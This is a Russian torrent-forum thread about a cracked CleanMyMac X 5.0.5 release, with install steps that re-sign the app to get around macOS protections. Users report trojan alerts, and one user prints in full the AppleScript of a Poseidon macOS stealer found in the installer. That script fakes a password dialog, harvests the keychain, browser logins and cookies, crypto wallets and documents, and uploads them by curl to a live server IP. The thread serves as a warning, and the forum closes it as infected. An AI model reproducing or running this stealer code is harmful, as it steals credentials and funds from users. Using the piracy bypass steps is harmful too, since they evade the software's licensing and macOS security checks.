CleanMyMac X 5.0.5 [Intel/Apple] [K-ed]

Страницы:  1
Тема закрыта
 

Hmlss

Стаж: 4 года 3 месяца

Сообщений: 9

Hmlss · 11-Фев-25 22:38 (2 месяца 15 дней назад)

CleanMyMac X
Год выпуска: 2025
Версия: 5.0.5
Разработчик: MacPaw
Сайт разработчика: https://macpaw.com/
Платформа: Intel/Apple Silicon Universal
Язык интерфейса: английский
Таблетка: Программа пролечена (не требует введения данных/вводим любые данные)
Системные требования: macOS 11 или выше
Описание: CleanMyMac X — это комплексный пакет для улучшения вашего Mac. Он очищает мегатонны мусора и заставляет ваш компьютер работать быстрее. CleanMyMac X ищет мусор во всех уголках вашей macOS. Он очищает ненужные файлы, такие как устаревшие кэши, сломанные загрузки, журналы и бесполезные локализации. Вы можете удалить тонны мусора и найти гигабайты больших скрытых файлов. Инструменты очистки Mac в CleanMyMac X сократят лишний вес за считанные секунды.
Доп. информация:
What's new:
The new Maintenance Task deals with Purgeable space — data that is safe to remove when more storage is needed. It commonly includes cached, temporary, and files that can be redownloaded or recreated.
When CleanMyMac frees up purgeable space, it doesn't impact essential files or applications.
Установка
:
1. Установите программу.
2. Введите команды в терминал:
xattr -cr /Applications/CleanMyMac_5.app
codesign --force --deep --sign - /Applications/CleanMyMac_5.app
Скриншоты
Скриншоты окна About
Download

Раздача закрыта

Rutracker.org не распространяет и не хранит электронные версии произведений, а лишь предоставляет доступ к создаваемому пользователями каталогу ссылок на торрент-файлы, которые содержат только списки хеш-сумм
Как скачивать? (для скачивания .torrent файлов необходима регистрация)
[Профиль]  [ЛС] 

Vakosss

Стаж: 15 лет 1 месяц

Сообщений: 16


Vakosss · 12-Фев-25 01:42 (спустя 3 часа, ред. 12-Фев-25 01:42)

дайте скорости, пожалуйста!
дайте скорости, пожалуйста!
[Профиль]  [ЛС] 

nemr1122

Стаж: 17 лет 5 месяцев

Сообщений: 6


nemr1122 · 12-Фев-25 12:50 (спустя 11 часов)

Required Application Helper. Please enter password for continue.
[Профиль]  [ЛС] 

perphy

Стаж: 14 лет 1 месяц

Сообщений: 12


perphy · 12-Фев-25 15:09 (спустя 2 часа 19 мин.)

[Профиль]  [ЛС] 

shivkumardas

Стаж: 17 лет 3 месяца

Сообщений: 8

shivkumardas · 12-Фев-25 16:15 (спустя 1 час 5 мин.)

nemr1122 писал(а):
87387016Required Application Helper. Please enter password for continue.
вводите свой пароль админа компа
[Профиль]  [ЛС] 

Annlike

Стаж: 15 лет 2 месяца

Сообщений: 13

Annlike · 12-Фев-25 22:42 (спустя 6 часов)

Apple could not verify “CleanMyMac” is free of malware that may harm your Mac or compromise your privacy.
[Профиль]  [ЛС] 

NicKDroyD

Стаж: 15 лет 3 месяца

Сообщений: 10

NicKDroyD · 13-Фев-25 00:48 (спустя 2 часа 6 мин.)

Не помогло, ошибка при установке pkg. Не удалось выполнить установку, обратитесь к ближайшему поставщику тортильи. Sip отключен
[Профиль]  [ЛС] 

tadescy

Стаж: 12 лет 7 месяцев

Сообщений: 38


tadescy · 15-Фев-25 15:10 (спустя 2 дня 14 часов)

Команда не верная. Ничего не работает.
[Профиль]  [ЛС] 

InfinityMe

Стаж: 14 лет 10 месяцев

Сообщений: 48


InfinityMe · 15-Фев-25 16:28 (спустя 1 час 18 мин., ред. 15-Фев-25 16:28)

Почему версии чередуются, на одну орут все антивирусы, на другую молчат. Речь конечно и прикладываемом файле для лечения или что он там делает.
CleanMyMac X 5.0.3_TorMac.org.dmg
https://www.virustotal.com/gui/file/85851ced8b6964403388ead93ee1b046715ec0e580b64d5ae3f01683ad7c33fa
CleanMyMac_5 5.0.5 .dmg
https://www.virustotal.com/gui/file/5d58d4bbfe3e74f50e63172ea84f2324e5c216f01bd742612727db4265ec007b
[Профиль]  [ЛС] 

Вальдемарити

Стаж: 15 лет 8 месяцев

Сообщений: 5


Вальдемарити · 15-Фев-25 19:04 (спустя 2 часа 36 мин.)

М2 Эйр полет нормальный.
[Профиль]  [ЛС] 

stepannikulin59

Стаж: 8 лет 3 месяца

Сообщений: 2


stepannikulin59 · 16-Фев-25 16:05 (спустя 21 час)

Все работает, спасибо за раздачу. Комманда активации у вас не работает потому, что программа устанавливается не в программы, а например в папку Приложения Хром, как было у меня. Чекайте этот момент.
[Профиль]  [ЛС] 

petrovich920567674

Стаж: 10 лет 6 месяцев

Сообщений: 1


petrovich920567674 · 16-Фев-25 16:46 (спустя 41 мин., ред. 16-Фев-25 16:46)

Все работает!!! пароль от мака сначала , потом разрешить установку из недостоверных источников, затем уже установка дальше и терминал. СПАСИБО
stepannikulin59 писал(а):
87407251Все работает, спасибо за раздачу. Комманда активации у вас не работает потому, что программа устанавливается не в программы, а например в папку Приложения Хром, как было у меня. Чекайте этот момент.
[Профиль]  [ЛС] 

Вальдемарити

Стаж: 15 лет 8 месяцев

Сообщений: 5


Вальдемарити · 16-Фев-25 17:43 (спустя 56 мин.)

Отвалилось на след день после установки, выпадает в ошибку при попытке открыть
[Профиль]  [ЛС] 

Katherine55

Стаж: 11 лет 2 месяца

Сообщений: 1


Katherine55 · 16-Фев-25 18:31 (спустя 48 мин.)

Касперский говорит, "обнаружена Троянская программа"...
[Профиль]  [ЛС] 

cedriferitan

Стаж: 8 лет

Сообщений: 2


cedriferitan · 17-Фев-25 06:02 (спустя 11 часов)

It works ! But instead of doing
Цитата:
attr -cr /Applications/CleanMyMac_5.app
odesign --force --deep --sign - /Applications/CleanMyMac_5.app
I did
Цитата:
attr -cr /Users/{username}/Applications/CleanMyMac_5.app
codesign --force --deep --sign - /Users/{username}/Applications/CleanMyMac_5.app
change {username} with your username
[Профиль]  [ЛС] 

skog1986

Стаж: 14 лет 9 месяцев

Сообщений: 10


skog1986 · 18-Фев-25 05:28 (спустя 23 часа, ред. 18-Фев-25 05:28)

ОСТОРОЖНО файл заражен стиллером стучит на set result_send to (do shell script "curl -X POST -H \"buildid: 1\" -H \"username: wooble\" --data-binary @/tmp/out.zip http://185.147.124.212/log")
pkgutil --expand CleanMyMac.pkg /Users/тут имя/Desktop/pkg/1
далее открываем текстовым редактором preinstall
#Poseidon #stealer for #macos with low detections
lol "poseidon[.]cool" domain points to its C2
saves zip in /tmp/pizda/😩
C2: 185.147.124.212
MD5:cf2647a0236766a5db94dfecfe87fbb9
скрытый текст
osascript -e 'set release to true
set filegrabbers to true
on mkdir(someItem)
try
set filePosixPath to quoted form of (POSIX path of someItem)
do shell script "mkdir -p " & filePosixPath
end try
end mkdir
on FileName(filePath)
try
set reversedPath to (reverse of every character of filePath) as string
set trimmedPath to text 1 thru ((offset of "/" in reversedPath) - 1) of reversedPath
set finalPath to (reverse of every character of trimmedPath) as string
return finalPath
end try
end FileName
on BeforeFileName(filePath)
try
set lastSlash to offset of "/" in (reverse of every character of filePath) as string
set trimmedPath to text 1 thru -(lastSlash + 1) of filePath
return trimmedPath
end try
end BeforeFileName
on writeText(textToWrite, filePath)
try
set folderPath to BeforeFileName(filePath)
mkdir(folderPath)
set fileRef to (open for access filePath with write permission)
write textToWrite to fileRef starting at eof
close access fileRef
end try
end writeText
on readwrite(path_to_file, path_as_save)
try
set fileContent to read path_to_file
set folderPath to BeforeFileName(path_as_save)
mkdir(folderPath)
do shell script "cat " & quoted form of path_to_file & " > " & quoted form of path_as_save
end try
end readwrite
on isDirectory(someItem)
try
set filePosixPath to quoted form of (POSIX path of someItem)
set fileType to (do shell script "file -b " & filePosixPath)
if fileType ends with "directory" then
return true
end if
return false
end try
end isDirectory
on GrabFolder(sourceFolder, destinationFolder)
try
set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews"}
set fileList to list folder sourceFolder without invisibles
mkdir(destinationFolder)
repeat with currentItem in fileList
if currentItem is not in exceptionsList then
set itemPath to sourceFolder & "/" & currentItem
set savePath to destinationFolder & "/" & currentItem
if isDirectory(itemPath) then
GrabFolder(itemPath, savePath)
else
readwrite(itemPath, savePath)
end if
end if
end repeat
end try
end GrabFolder
on GetUUID(pather, searchString)
try
set theFile to POSIX file pather
set fileContents to read theFile
set startPos to offset of searchString in fileContents
if startPos is 0 then
return "not found"
end if
set uuidStart to startPos + (length of searchString)
set uuid to text uuidStart thru (uuidStart + 55) of fileContents
set endpos to offset of "\\" in uuid
if endpos is 0 then
return "not found"
end if
set realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContents
return realuuid
on error
return "not found"
end try
end GetUUID
on firewallets(firepath, savepath)
try
set fire_wallets to {{"MetaMask", "webextension@metamask.io\\\":\\\""}}
repeat with wallet in fire_wallets
set uuid to GetUUID(firepath & "/prefs.js", item 2 of wallet)
if uuid is not "not found" then
set walkpath to firepath & "/storage/default/"
set fileList to list folder walkpath without invisibles
repeat with currentItem in fileList
if (currentItem contains uuid) and (currentItem contains "userContext") then
set fwallet to walkpath & currentItem & "/idb/"
set fileList_wallet to list folder fwallet without invisibles
repeat with currentItem_wallet in fileList_wallet
if isDirectory(fwallet & currentItem_wallet) then
GrabFolder(fwallet & currentItem_wallet, savepath & "/" &item 1 of wallet & "/")
end if
end repeat
end if
end repeat
end if
end repeat
end try
end firewallets
on parseFF(browsername, firefox, writemind)
try
set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
set fileList to list folder firefox without invisibles
repeat with currentItem in fileList
set fpath to writemind & "gecko/" & browsername & "_" & currentItem
firewallets(firefox & currentItem, fpath)
set readpath to firefox & currentItem
repeat with FFile in myFiles
readwrite(readpath & FFile, fpath & FFile)
end repeat
end repeat
end try
end parseFF
on checkvalid(username, password_entered)
try
set result to do shell script "dscl . authonly " & quoted form of username & space & quoted form of password_entered
if result is not equal to "" then
return false
else
return true
end if
on error
return false
end try
end checkvalid
on getpwd(username, writemind)
try
if checkvalid(username, "") then
set result to do shell script "security 2>&1 > /dev/null find-generic-password -ga \"Chrome\" | awk \"{print $2}\""
writeText(result as string, writemind & "masterpass-chrome")
else
repeat
set result to display dialog "Required Application Helper. Please enter password for continue." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer
set password_entered to text returned of result
if checkvalid(username, password_entered) then
writeText(password_entered, writemind & "pwd")
return password_entered
end if
end repeat
end if
end try
return ""
end getpwd
on grabPlugins(paths, savePath, pluginList, index)
try
set fileList to list folder paths without invisibles
repeat with PFile in fileList
repeat with Plugin in pluginList
if (PFile contains Plugin) then
set newpath to paths & PFile
set newsavepath to savePath & "/" & Plugin
if index then
set newsavepath to newsavepath & "/IndexedDB/"
end if
GrabFolder(newpath, newsavepath)
end if
end repeat
end repeat
end try
end grabPlugins
on chromium(writemind, chromium_map)
set pluginList to {"ldinpeekobnhjjdofggfgjlcehhmanlj","nphplpgoakhhjchkkhmiggakijnkhfnd","jbkgjmpfammbgejcpedggoefddacbdia","fccgmnglbhajioalokbcidhcaikhlcpm","nebnhfamliijlghikdgcigoebonmoibm","fdcnegogpncmfejlfnffnofpngdiejii","mfhbebgoclkghebffdldpobeajmbecfk","ffbceckpkpbcmgiaehlloocglmijnpmp","kfdniefadaanbjodldohaedphafoffoh","bedogdpgdnifilpgeianmmdabklhfkcn","kpfchfdkjhcoekhdldggegebfakaaiog","klnaejjgbibmhlephnhpmaofohgkpgkd","opcgpfmipidbgpenhmajoajpbobppdil","mmmjbcfofconkannjonfmjjajpllddbg","modjfdjcodmehnpccdjngmdfajggaoeh","dkdedlpgdmmkkfjabffeganieamfklkm","ifclboecfhkjbpmhgehodcjpciihhmif","ppbibelpcjmhbdihakflkdcoccbgbkpo","ejjladinnckdgjemekebdpeokbikhfci","kkpllkodjeloidieedojogacfhpaihoh","apnehcjmnengpnmccpaibjmhhoadaico","jiepnaheligkibgcjgjepjfppgbcghmp","jojhfeoedkpkglbfimdfabpdfjaoolaf","idpdilbfamoopcfofbipefhmmnflljfi","lbjapbcmmceacocpimbpbidpgmlmoaao","oiohdnannmknmdlddkdejbmplhbdcbee","fldfpgipfncgndfolcbkdeeknbbbnhcc","fpkhgmpbidmiogeglndfbkegfdlnajnf","lgmpcpglpngdoalbgeoldeajfclnhafa","ilhaljfiglknggcoegeknjghdgampffk","pfccjkejcgoppjnllalolplgogenfojk","cnmamaachppnkjgnildpdmkaakejnhae","eajafomhmkipbjmfmhebemolkcicgfmd","emeeapjkbcbpbpgaagfchmcgglmebnen","ibnejdfjmmkpcnlpebklmnkoeoihofec","hifafgmccdpekplomjjkcfgodnhcellj","ffnbelfdoeiohenkjibnmadjiehjhajb","fnjhmkhhmkbjkkabndcnnogagogbneec","bcopgchhojmggmffilplmbdicgaihlkp","cmoakldedjfnjofgbbfenefcagmedlga","ifckdpamphokdglkkdomedpdegcjhjdp","ibljocddagjghmlpgihahamcghfggcjc","cjmkndjhnagcfbpiemnkdpomccnjblmj","kbdcddcmgoplfockflacnnefaehaiocb","cgeeodpfagjceefieflmdfphplkenlfk","afbcbjpbpfadlkmhmclhkeeodmamcflc","fdchdcpieegfofnofhgdombfckhbcokj","gjlmehlldlphhljhpnlddaodbjjcchai","ellkdbaphhldpeajbepobaecooaoafpg","ojbcfhjmpigfobfclfflafhblgemeidi","ghlmndacnhlaekppcllcpcjjjomjkjpg","kgdijkcfiglijhaglibaidbipiejjfdp","abkahkcbhngaebpcgfmhkoioedceoigp","ammjlinfekkoockogfhdkgcohjlbhmff","pdliaogehgdbhbnmkklieghmmjkpigpa","jnlgamecbpmbajjfhmmmlhejkemejdma","nbdhibgjnjpnkajaghbffjbkcgljfgdi","jfdlamikmbghhapbgfoogdffldioobgl","fijngjgcjhjmmpcmkeiomlglpeiijkld","hgbeiipamcgbdjhfflifkgehomnmglgk","pmmnimefaichbcnbndcfpaagbepnjaig","cflgahhmjlmnjbikhakapcfkpbcmllam","keenhcnmdmjjhincpilijphpiohdppno","bipdhagncpgaccgdbddmbpcabgjikfkn","bcenedbpaaegpnijoadpdjiachahncdg","pocmplpaccanhmnllbbkpgfliimjljgo","klghhnkeealcohjjanjjdaeeggmfmlpl","cjookpbkjnpkmknedggeecikaponcalb","ojggmchlghnjlapmfbnjholfjkiidbch","dngmlblcodfobpdpecaadgfbcggfjfnm","jnldfbidonfeldmalbflbmlebbipcnle","ehjiblpccbknkgimiflboggcffmpphhp","agoakfejjabomempkjlepdflaleeobhb","fopmedgnkfpebgllppeddmmochcookhc","dmkamcknogkgcdfhhbddcghachkejeap","iglbgmakmggfkoidiagnhknlndljlolb","opfgelmcmbiajamepnmloijbpoleiama","gkeelndblnomfmjnophbhfhcjbcnemka","dgiehkgfknklegdhekgeabnhgfjhbajd","gafhhkghbfjjkeiendhlofajokpaflmk","imlcamfeniaidioeflifonfjeeppblda","penjlddjkjgpnkllboccdgccekpkcbin","nhnkbkgjikgcigadomkphalanndcapjk","egjidjbpglichdcondbcbdnbeeppgdph","dlcobpjiigpikoobohmabehhmhfoodbb","dldjpboieedgcmpkchcjcbijingjcgok","acmacodkjbdgmoleebolmdjonilkdbch","lccbohhgfkdikahanoclbdmaolidjdfl","pcndjhkinnkaohffealmlmhaepkpmgkb","gjagmgiddbbciopjhllkdnddhcglnemk","cnncmdhjacpkmjmkcafchppbnpnhdmon","mfgccjchihfkkindfppnaooecgfneiii","ieldiilncjhfkalnemgjbffmpomcaigi","ckklhkaabbmdjkahiaaplikpdddkenic","loinekcabhlmhjjbocijdoimmejangoa","mgffkfbidihjpoaomajlbgchddlicgpn","pnndplcbkakcplkjnolgbkdgjikjednm","mcohilncbfahbmgdjkbpemcciiolgcge","bgpipimickeadkjlklgciifhnalhdjhe","pdadjkfkgcafgbceimcpbkalnfnepbnk","jiidiaalihmmhddjgbnbgdfflelocpak","aeachknmefphepccionboohckonoeemg","gdokollfhmnbfckbobkdbakhilldkhcj","jiiigigdinhhgjflhljdkcelcjfmplnd","kmphdnilpmdejikjdnlbcnmnabepfgkh","jaooiolkmfcmloonphpiiogkfckgciom","fcckkdbjnoikooededlapcalpionmalo","mdnaglckomeedfbogeajfajofmfgpoae","ebfidpplhabeedpnhjnobghokpiioolj","dbgnhckhnppddckangcjbkjnlddbjkna","cpmkedoipcpimgecpmgpldfpohjplkpp","epapihdplajcdnnkdeiahlgigofloibg","iokeahhehimjnekafflcihljlcjccdbe","cihmoadaighcejopammfbmddcmdekcje","hnfanknocfeofbddgcijnmhnfnkdnaad","kilnpioakcdndlodeeceffgjdpojajlo","abogmiocnneedmmepnohnhlijcjpcifd","bofddndhbegljegmpmnlbhcejofmjgbn","aholpfdialjgjfhomihkjbmgjidlcdno","hdkobeeifhdplocklknbnejdelgagbao","oafedfoadhdjjcipmcbecikgokpaphjk","bfnaelmomeimhlpmgjnjophhpkkoljpa","nkbihfbeogaeaoehlefnkodbefgpgknn","lfmmjkfllhmfmkcobchabopkcefjkoip","aiifbnbfobpmeekipheeijimdpnlpgpp","anokgmphncpekkhclmingpimjmcooifb","mnfifefkajgofkcjkemidiaecocnkjeh","momakdpclmaphlamgjcndbgfckjfpemp","akkmagafhjjjjclaejjomkeccmjhdkpa","ehgjhhccekdedpbkifaojjaefeohnoea","mkpegjkblkkefacfnmkajcjmabijhclg","mlhakagmgkmonhdonhkpjeebfphligng","niiaamnmgebpeejeemoifgdndgeaekhe","jnmbobjmhlngoefaiojfljckilhhlhcj","onhogfjeacnfoofkfgppdlbmlmnplgbn","kppfdiipphfccemcignhifpjkapfbihd","hcjhpkgbmechpabifbggldplacolbkoh","flpiciilemghbmfalicajoolhkkenfel","mlbnicldlpdimbjdcncnklfempedeipj","cfbfdhimifdmdehjmkdobpcjfefblkjm","ocjobpilfplciaddcbafabcegbilnbnb","pgiaagfkgcbnmiiolekcfmljdagdhlcm","enabgbdfcbaehmbigakijjabdpdnimlg","bifidjkcdpgfnlbcjpdkdcnbiooooblg","lnnnmfcpbkafcpgdilckhmhbkkbpkmid","nlgbhdfgdhgbiamfdfmbikcdghidoadd","fcfcfllfndlomdhbehjjcoimbgofdncg","lpilbniiabackdjcionkobglmddfbcjo","efbglgofoippbgcjepnhiblaibcnclgk","fhbohimaelbohpjbbldcngcnapndodjp","gkodhkbmiflnmkipcmlhhgadebbeijhh","bocpokimicclpaiekenaeelehdjllofo","bhhhlbepdkbapadjdnnojkbgioiodbic","aflkmfhebedbjioipglgcbcmnbpgliof","mkchoaaiifodcflmbaphdgeidocajadp","mapbhaebnddapnmifbbkgeedkeplgjmf","lmkncnlpeipongihbffpljgehamdebgi","gjnckgkfmgmibbkoficdidcljeaaaheg","ppdadbejkmjnefldpcdjhnkpbjkikoip","bopcbmipnjdcdfflfgjdgdjejmgpoaab","kamfleanhcmjelnhaeljonilnmjpkcjc","cphhlgmgameodnhkjdmkpanlelnlohao","hnhobjmcibchnmglfbldbfabcgaknlkj","nknhiehlklippafakaeklbeglecifhad","kjjebdkfeagdoogagbhepmbimaphnfln","phkbamefinggmakgklpkljjmgibohnba","lakggbcodlaclcbbbepmkpdhbcomcgkd","ookjlbkiijinhpmnjffcofjonbfbgaoc","mdjmfdffdcmnoblignmgpommbefadffd","jblndlipeogpafnldhgmapagcccfchpi","hbbgbephgojikajhfbomhlmmollphcad","dpcklmdombjcplafheapiblogdlgjjlb","hmeobnfnfcmdkdcmlblgagmfpfboieaf","kmhcihpebfmpgmihbkipmjlmmioameka","kennjipeijpeengjlogfdjkiiadhbmjl","amkmjjmmflddogmhpjloimipbofnfjih","idnnbdplmphpflfnlkomgpfbpcgelopg","fmblappgoiilbgafhjklehhfifbdocee","heamnjbnflcikcggoiplibfommfbkjpj","khpkpbbcccdmmclmpigdgddabeilkdpd","omaabbefbmiijedngplfjmnooppbclkk","nhlnehondigmgckngjomcpcefcdplmgc","fiikommddbeccaoicoejoniammnalkfa","ejbidfepgijlcgahbmbckmnaljagjoll","glmhbknppefdmpemdmjnjlinpbclokhn","kncchdigobghenbbaddojjnnaogfppfj","hpclkefagolihohboafpheddmmgdffjm","ilolmnhjbbggkmopnemiphomhaojndmb","panpgppehdchfphcigocleabcmcgfoca"}
set chromiumFiles to {"/Network/Cookies", "/Cookies", "/Web Data", "/Login Data", "/Local Extension Settings/", "/IndexedDB/"}
repeat with chromium in chromium_map
set savePath to writemind & "chromium/" & item 1 of chromium & "_"
try
set fileList to list folder item 2 of chromium without invisibles
repeat with currentItem in fileList
if ((currentItem as string) is equal to "Default") or ((currentItem as string) contains "Profile") then
repeat with CFile in chromiumFiles
set readpath to (item 2 of chromium & currentItem & CFile)
if ((CFile as string) is equal to "/Network/Cookies") then
set CFile to "/Cookies"
end if
if ((CFile as string) is equal to "/Local Extension Settings/") then
grabPlugins(readpath, savePath & currentItem, pluginList, false)
else if (CFile as string) is equal to "/IndexedDB/" then
grabPlugins(readpath, savePath & currentItem, pluginList, true)
else
set writepath to savePath & currentItem & CFile
readwrite(readpath, writepath)
end if
end repeat
end if
end repeat
end try
end repeat
end chromium
on deskwallets(writemind, deskwals)
repeat with deskwal in deskwals
try
GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal)
end try
end repeat
end deskwallets
on filegrabber()
set destFolder to "/tmp/pizda/finder/"
set destinationFolderPath to POSIX file destFolder
set notesMedia to POSIX file (destFolder & "NotesMedia/")
set extensionsList to {"txt", "pdf", "docx", "wallet", "key", "keys", "doc", "jpeg", "png", "kdbx"}
set bankSize to 0
set uuidString to do shell script "system_profiler SPHardwareDataType | awk \"/UUID/ { print $3 }\""
mkdir(destinationFolderPath)
mkdir(notesMedia)
tell application "Finder"
try
set safariFolderPath to (path to home folder as text) & "Library:Cookies:"
duplicate file (safariFolderPath & "Cookies.binarycookies") to folder destinationFolderPath with replacing
set name of result to "saf1"
end try
set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try
duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
end try
set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
try
set notesFolder to folder notesFolderPath
set notesFiles to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
repeat with aFile in notesFiles
try
duplicate (file aFile of notesFolder) to folder destinationFolderPath with replacing
end try
end repeat
end try
set notesAccountsPath to (notesFolderPath & "Accounts:")
try
set notesAccountsFolder to folder notesAccountsPath
set notesAccountsFiles to every folder of notesAccountsFolder
repeat with nFile in notesAccountsFiles
set notesMediaPath to notesAccountsPath & name of nFile & ":Media:"
set notesMediaProfiles to every folder of (folder notesMediaPath)
repeat with profileFolder in notesMediaProfiles
set notesMediaProfilesPath to notesMediaPath & name of profileFolder
set notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)
repeat with notesUUID in notesMediaProfileFiles
duplicate notesUUID to notesMedia with replacing
end repeat
end repeat
end repeat
end try
try
set safariFolderPath to (path to library folder from user domain as text) & "Safari:"
duplicate (file "Form Values" of folder safariFolderPath) to destinationFolderPath with replacing
end try
try
set keychainFolder to (path to library folder from user domain as text) & "Keychains:" & uuidString
duplicate folder keychainFolder to destinationFolderPath with replacing
end try
try
set desktopFiles to every file of desktop
set documentsFiles to every file of folder "Documents" of (path to home folder)
set downloadsFiles to every file of folder "Downloads" of (path to home folder)
repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)
set fileExtension to name extension of aFile
if fileExtension is in extensionsList then
set filesize to size of aFile
if (bankSize + filesize) < 10 * 1024 * 1024 then
try
duplicate aFile to folder destinationFolderPath with replacing
set bankSize to bankSize + filesize
end try
else
exit repeat
end if
end if
end repeat
end try
end tell
end filegrabber
on send_data(attempt)
try
set result_send to (do shell script "curl -X POST -H \"buildid: 1\" -H \"username: wooble\" --data-binary @/tmp/out.zip http://185.147.124.212/log")
on error
if attempt < 10 then
delay 60
send_data(attempt + 1)
end if
end try
end send_data
set username to (system attribute "USER")
set profile to "/Users/" & username
set writemind to "/tmp/pizda/"
try
set result to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
writeText(result, writemind & "hardware")
end try
set library to profile & "/Library/Application Support/"
set password_entered to getpwd(username, writemind)
delay 0.01
set chromiumMap to {{"Chrome", library & "Google/Chrome/"}, {"Brave", library & "BraveSoftware/Brave-Browser/"}, {"Edge", library & "Microsoft Edge/"}, {"Vivaldi", library & "Vivaldi/"}, {"Opera", library & "com.operasoftware.Opera/"}, {"OperaGX", library & "com.operasoftware.OperaGX/"}, {"Chrome Beta", library & "Google/Chrome Beta/"}, {"Chrome Canary", library & "Google/Chrome Canary"}, {"Chromium", library & "Chromium/"}, {"Chrome Dev", library & "Google/Chrome Dev/"}}
set walletMap to {{"deskwallets/Electrum", profile & "/.electrum/wallets/"}, {"deskwallets/Coinomi", library & "Coinomi/wallets/"}, {"deskwallets/Exodus", library & "Exodus/"}, {"deskwallets/Atomic", library & "atomic/Local Storage/leveldb/"}, {"deskwallets/Wasabi", profile & "/.walletwasabi/client/Wallets/"}, {"deskwallets/Ledger_Live", library & "Ledger Live/"}, {"deskwallets/Monero", profile & "/Monero/wallets/"}, {"deskwallets/Bitcoin_Core", library & "Bitcoin/wallets/"}, {"deskwallets/Litecoin_Core", library & "Litecoin/wallets/"}, {"deskwallets/Dash_Core", library & "DashCore/wallets/"}, {"deskwallets/Electrum_LTC", profile & "/.electrum-ltc/wallets/"}, {"deskwallets/Electron_Cash", profile & "/.electron-cash/wallets/"}, {"deskwallets/Guarda", library & "Guarda/"}, {"deskwallets/Dogecoin_Core", library & "Dogecoin/wallets/"}, {"deskwallets/Trezor_Suite", library & "@trezor/suite-desktop/"}}
readwrite(library & "Binance/app-store.json", writemind & "deskwallets/Binance/app-store.json")
readwrite(library & "@tonkeeper/desktop/config.json", "deskwallets/TonKeeper/config.json")
readwrite(profile & "/Library/Keychains/login.keychain-db", writemind & "kc")
if release then
readwrite(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite", writemind & "FileGrabber/NoteStore.sqlite")
readwrite(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal", writemind & "FileGrabber/NoteStore.sqlite-wal")
readwrite(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm", writemind & "FileGrabber/NoteStore.sqlite-shm")
readwrite(profile & "/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies", writemind & "FileGrabber/Cookies.binarycookies")
readwrite(profile & "/Library/Cookies/Cookies.binarycookies", writemind & "FileGrabber/saf1")
end if
if filegrabbers then
filegrabber()
end if
writeText(username, writemind & "user")
set ff_paths to {{"Firefox", library & "Firefox/Profiles/"}, {"Waterfox", library & "Waterfox/Profiles/"}}
repeat with gecko in ff_paths
try
parseFF(item 1 of gecko, item 2 of gecko, writemind)
end try
end repeat
chromium(writemind, chromiumMap)
deskwallets(writemind, walletMap)
do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/out.zip"
send_data(0)
do shell script "rm -r " & writemind
do shell script "rm /tmp/out.zip"'
[Профиль]  [ЛС] 

livv

Стаж: 17 лет 9 месяцев

Сообщений: 40


livv · 18-Фев-25 05:48 (спустя 20 мин.)

В версии 5.0.5 троянский конь спрятался. 5.0.3 чистая
[Профиль]  [ЛС] 

username174

Стаж: 2 года

Сообщений: 1


username174 · 21-Фев-25 00:59 (спустя 2 дня 19 часов)

троян стиллер, лучше остаться на версии 5.0.3
[Профиль]  [ЛС] 

vidorio

Стаж: 4 года 11 месяцев

Сообщений: 1


vidorio · 21-Фев-25 12:07 (спустя 11 часов)

perphy писал(а):
87387518
I've got the same error, how did you fix this?
[Профиль]  [ЛС] 

skog1986

Стаж: 14 лет 9 месяцев

Сообщений: 10


skog1986 · 21-Фев-25 18:26 (спустя 6 часов, ред. 21-Фев-25 18:26)

vidorio писал(а):
87427976
perphy писал(а):
87387518
I've got the same error, how did you fix this?
Do not use this installer from here because it is infected with a stealer that captures all wallets, browser cookies, passwords, text files, and images below a certain size. Check my post above for a full analysis of the installer and exactly what it steals.
If you have already run the installer from here, change all possible passwords immediately, as your computer has been compromised, and your data has been sent to an attacker’s server.
If I were the administrators, I would shut down this section entirely, as people are getting infected here almost every day. https://www.broadcom.com/support/security-center/protection-bulletin/poseidon-inf...-targeting-macos
[Профиль]  [ЛС] 

Se7enteen

Стаж: 12 лет 8 месяцев

Сообщений: 5

Se7enteen · 22-Фев-25 01:04 (спустя 6 часов)

skog1986 писал(а):
87429443
vidorio писал(а):
87427976
perphy писал(а):
87387518
I've got the same error, how did you fix this?
Do not use this installer from here because it is infected with a stealer that captures all wallets, browser cookies, passwords, text files, and images below a certain size. Check my post above for a full analysis of the installer and exactly what it steals.
If you have already run the installer from here, change all possible passwords immediately, as your computer has been compromised, and your data has been sent to an attacker’s server.
If I were the administrators, I would shut down this section entirely, as people are getting infected here almost every day. https://www.broadcom.com/support/security-center/protection-bulletin/poseidon-inf...-targeting-macos
Agree, admins should take a look
[Профиль]  [ЛС] 

igorspb

Moderator

Стаж: 17 лет 11 месяцев

Сообщений: 3270

igorspb · 25-Фев-25 15:37 (спустя 3 дня)

троян в раздаче
[Профиль]  [ЛС] 
 
Тема закрыта
Loading...
Error